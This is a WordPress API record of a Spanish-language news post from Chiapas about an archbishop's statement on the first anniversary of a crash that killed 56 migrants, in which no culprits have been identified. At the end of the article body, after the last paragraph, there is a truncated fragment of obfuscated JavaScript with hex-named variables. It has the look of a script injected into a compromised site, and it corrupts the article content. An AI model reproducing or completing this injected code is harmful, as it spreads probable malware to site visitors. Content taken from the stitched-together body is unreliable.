{"id":7219,"date":"2022-12-12T03:37:54","date_gmt":"2022-12-12T03:37:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7219"},"modified":"2022-12-12T03:37:55","modified_gmt":"2022-12-12T03:37:55","slug":"a-un-ano-de-la-tragedia-migrante-no-hay-responsables-detenidos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7219","title":{"rendered":"A un a\u00f1o de la tragedia migrante, no hay responsables detenidos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221211-WA0005-1024x576.jpg\" alt=\"\" class=\"wp-image-7221\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221211-WA0005-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221211-WA0005-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221211-WA0005-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221211-WA0005.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Rodolfo Flores.<br>Agencia ReporteCiudadano, 11 de diciembre de 2022. Tuxtla Guti\u00e9rrez.- Este domingo, el arzobispo de Tuxtla Guti\u00e9rrez, Fabio Mart\u00ednez Castilla lament\u00f3 que, un a\u00f1o del accidente en el que perdieron la vida 56 migrantes, a\u00fan no sabemos qui\u00e9n o qui\u00e9nes fueron los culpables; esto no ayuda para nada al pa\u00eds, porque nos deja una sensaci\u00f3n de impotencia ante la impunidad; esto no hace sino poner en evidencia la corrupci\u00f3n que a\u00fan prevalece en torno al tema migratorio.<br>Monse\u00f1or hizo un llamado a las autoridades para que esclarezcan este lamentable hecho y se establezcan los mecanismos para que situaciones como estas no se repitan.<br>&#8220;Es momento para que se establezcan condiciones para la tan anhelada &#8220;migraci\u00f3n segura, ordenada y regular&#8221;, que tanto se necesita en medio de esta crisis humanitaria&#8221; declar\u00f3<br>Expuso que el pasado viernes 9 de diciembre, en la fiesta de San Juan Diego, celebraron el aniversario con una Eucarist\u00eda en el lugar del accidente. &#8220;En la misa encomendamos a la misericordia de Dios a cada uno de los migrantes fallecidos, a quienes nombramos de uno en uno&#8221; dijo.<br>Y acot\u00f3 que &#8220;esa fecha se ha convertido ya en un s\u00edmbolo del terrible drama que cotidianamente viven los migrantes en su paso por nuestra tierra. Necesitamos seguir orando para que en M\u00e9xico se despierte la justicia y el amor y pronto las autoridades resuelvan esta situaci\u00f3n, que sigue doliendo a los familiares de los fallecidos y a todos nosotros&#8221;.<br>Mencion\u00f3 que el pr\u00f3ximo viernes, en la Casa del Migrante &#8220;Jes\u00fas esperanza en el camino&#8221;, que sostiene la pastoral social de la di\u00f3cesis a trav\u00e9s de la Pastoral de la Movilidad humana, celebrar\u00e1n la posada del migrante, con la finalidad de sensibilizar a los integrantes de la iglesia sobre el fen\u00f3meno migratorio que cada vez m\u00e1s va tomando caracter\u00edsticas de una verdadera crisis humanitaria.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.Agencia ReporteCiudadano, 11 de diciembre de 2022. Tuxtla Guti\u00e9rrez.- Este domingo, el arzobispo de Tuxtla Guti\u00e9rrez, Fabio Mart\u00ednez Castilla lament\u00f3 que, un a\u00f1o del accidente en el que perdieron la vida 56 migrantes, a\u00fan no sabemos qui\u00e9n o qui\u00e9nes fueron los culpables; esto no ayuda para nada al pa\u00eds, porque nos deja una sensaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7221,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-7219","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7219","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7219"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7219\/revisions"}],"predecessor-version":[{"id":7222,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7219\/revisions\/7222"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7221"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7219"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7219"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7219"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}